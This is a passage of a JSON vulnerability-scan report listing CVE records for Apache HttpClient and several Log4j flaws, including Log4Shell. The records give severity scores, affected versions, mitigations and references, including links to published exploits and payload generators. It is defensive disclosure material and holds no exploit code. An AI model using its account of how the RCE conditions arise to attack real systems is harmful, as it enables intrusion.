List","url":"https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"NetApp Advisory ntap-20220210-0002","url":"https://security.netapp.com/advisory/ntap-20220210-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"]}],"title":"CVE-2020-13956/pkg:maven/org.apache.httpcomponents/httpclient@4.5.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45046"]}],"cve":"CVE-2021-45046","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-14T18:01:28","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45046"},{"system_name":"GitHub Advisory","text":"GHSA-jfh8-c2jp-5v3q"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5022"},{"system_name":"Gentoo Advisory","text":"glsa-202310-16"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Incomplete fix for Apache Log4j vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Incomplete fix for Apache Log4j vulnerability # Impact  The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.   ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.  # Mitigation  Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).  Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/18/1"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-jfh8-c2jp-5v3q","url":"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"Gentoo Advisory glsa-202310-16","url":"https://security.gentoo.org/glsa/202310-16"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Cve 2021","url":"https://www.cve.org/CVERecord?id=CVE-2021-44228"},{"summary":"Debian Advisory dsa-5022","url":"https://www.debian.org/security/2021/dsa-5022"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":9.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]}],"title":"CVE-2021-45046/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44832"]}],"cve":"CVE-2021-44832","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-04T16:14:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-44832"},{"system_name":"Apache Advisory","text":"LOG4J2-3293"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220104-0001"},{"system_name":"Siemens Advisory","text":"ssa-784507"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"Improper Input Validation and Injection in Apache Log4j2"},{"category":"details","details":"Vulnerability Details","text":"# Improper Input Validation and Injection in Apache Log4j2 Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.   # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.  This issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.4"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/28/1"},{"summary":"Siemens Advisory ssa-784507","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"},{"summary":"Apache Advisory LOG4J2-3293","url":"https://issues.apache.org/jira/browse/LOG4J2-3293"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"NetApp Advisory ntap-20220104-0001","url":"https://security.netapp.com/advisory/ntap-20220104-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"]}],"title":"CVE-2021-44832/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44228"]}],"cve":"CVE-2021-44228","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-12-10T00:40:56","ids":[{"system_name":"Twitter Advisory","text":"1469345530182455296"},{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-44228"},{"system_name":"GitHub Advisory","text":"GHSA-7rjr-3q55-vv33"},{"system_name":"Apple Advisory","text":"HT213189"},{"system_name":"Apache Advisory","text":"LOG4J2-3198"},{"system_name":"Apache Advisory","text":"LOG4J2-3201"},{"system_name":"Apache Advisory","text":"LOG4J2-3214"},{"system_name":"Apache Advisory","text":"LOG4J2-3221"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Bentley Advisory","text":"be-2022-0001"},{"system_name":"Apache Advisory","text":"changes-report"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"lookups"},{"system_name":"Microsoft Advisory","text":"microsofts-response-to-cve-2021-44228-apache-log4j2"},{"system_name":"Apache Advisory","text":"migration"},{"system_name":"NetApp Advisory","text":"ntap-20211210-0007"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Resource Consumption","title":"Additional CWE: 400"},{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Remote code injection in Log4j"},{"category":"details","details":"Vulnerability Details","text":"# Remote code injection in Log4j # Summary  Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.  Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory.  # Impact  Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input.   # Affected versions  Any Log4J version prior to v2.15.0 is affected to this specific issue.  The v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.  ## Security releases Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3  ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.  # Remediation Advice  ## Updated advice for version 2.16.0  The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0). Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33).  Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221).  Please note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.2"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Mar/23"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-7rjr-3q55-vv33","url":"https://github.com/advisories/GHSA-7rjr-3q55-vv33"},{"summary":"Apache Advisory LOG4J2-3198","url":"https://issues.apache.org/jira/browse/LOG4J2-3198"},{"summary":"Apache Advisory LOG4J2-3201","url":"https://issues.apache.org/jira/browse/LOG4J2-3201"},{"summary":"Apache Advisory LOG4J2-3214","url":"https://issues.apache.org/jira/browse/LOG4J2-3214"},{"summary":"Apache Advisory LOG4J2-3221","url":"https://issues.apache.org/jira/browse/LOG4J2-3221"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Apache Advisory 